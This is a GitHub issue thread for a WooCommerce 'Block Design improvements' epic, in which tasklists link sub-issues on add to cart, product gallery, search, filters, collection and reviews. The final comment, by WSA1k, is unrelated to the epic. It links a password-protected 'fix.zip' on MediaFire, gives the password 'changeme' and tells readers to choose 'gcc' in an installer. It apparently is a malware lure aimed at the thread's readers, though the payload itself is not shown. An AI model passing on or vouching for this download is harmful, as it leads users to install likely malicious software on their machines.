### ISSUE TITLE
[EPIC] Block Design improvements

### ISSUE THREAD

**Issue by albarin** [woothemes/woocommerce#50951]
```[tasklist]
### Add to cart
- [ ] https://github.com/woocommerce/woocommerce/issues/47932
- [ ] https://github.com/woocommerce/woocommerce/issues/47931
- [ ] https://github.com/woocommerce/woocommerce/issues/47930
- [ ] https://github.com/woocommerce/woocommerce/issues/47935
- [ ] https://github.com/woocommerce/woocommerce/issues/47794
``` 

```[tasklist]
### Product image & gallery
- [ ] https://github.com/woocommerce/woocommerce/issues/47923
- [ ] https://github.com/woocommerce/woocommerce/issues/47926
``` 

```[tasklist]
### Product search
- [ ] https://github.com/woocommerce/woocommerce/issues/47892
- [ ] https://github.com/woocommerce/woocommerce/issues/47890
- [ ] https://github.com/woocommerce/woocommerce/issues/47889
- [ ] https://github.com/woocommerce/woocommerce/issues/47888
``` 

```[tasklist]
### Single product
- [ ] https://github.com/woocommerce/woocommerce/issues/47922
````

```[tasklist]
### Product filters
- [ ] https://github.com/woocommerce/woocommerce/issues/47886
```

```[tasklist]
### Product collection
- [ ] https://github.com/woocommerce/woocommerce/issues/47884
- [ ] https://github.com/woocommerce/woocommerce/issues/47789
```

```[tasklist]
### Product reviews
- [ ] Hide the block when there are no reviews.
- [ ] https://github.com/woocommerce/woocommerce/issues/42947
```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
